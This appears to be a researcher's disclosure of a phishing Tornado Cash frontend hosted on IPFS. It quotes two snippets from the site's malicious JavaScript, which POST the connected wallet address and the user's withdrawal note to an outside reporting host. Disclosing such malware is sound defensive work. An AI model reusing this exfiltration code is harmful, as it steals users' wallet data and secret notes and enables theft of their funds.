Discovery process:
Today, while studying the tornado protocol, I searched for available withdrawal frontends through a search engine and discovered this very "decentralized" frontend at https://ipfs.io/ipns/tornadocash-ipfs.eth/. The website looks legitimate, but when I inspected the network requests, I found that the JavaScript on this webpage has abnormal behavior and the frontend is reporting highly sensitive user data.
Analysis:
In Chrome, when globally searching for the reporting address in the code, bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4[.]cfipfs[.]com/v1, I found a lot of reporting code that reports sensitive data from user connected wallets, withdrawal notes, withdrawal addresses, and the entire process. The malicious code is stored in edafb4b.js, which can be found at https://ipfs.io/ipns/tornadocash-ipfs.eth/_nuxt/edafb4b.js.
Some of the reporting code is as follows:
(1) Reporting the connected wallet address:
{
fetch("https://bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4.cfipfs.com/v1/", {
headers: {
"content-type": "application/json; charset=UTF-8"
},
body: '{"connectedwallet": "'.concat(t, '"}'),
method: "POST"
}).then((function() {}
))
}
(2) Reporting the generated withdrawal note by the user:
((function() {
this.prefix,
this.note;
fetch("https://bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4.cfipfs.com/v1", {
headers: {
"content-type": "application/json; charset=UTF-8"
},
body: '{"newdepositnote": "'.concat(this.prefix, "-").concat(this.note, '"}'),
method: "POST"
}).then((function() {}
))
}
)),
Conclusion:
The tornadocash-ipfs.eth frontend is a phishing website.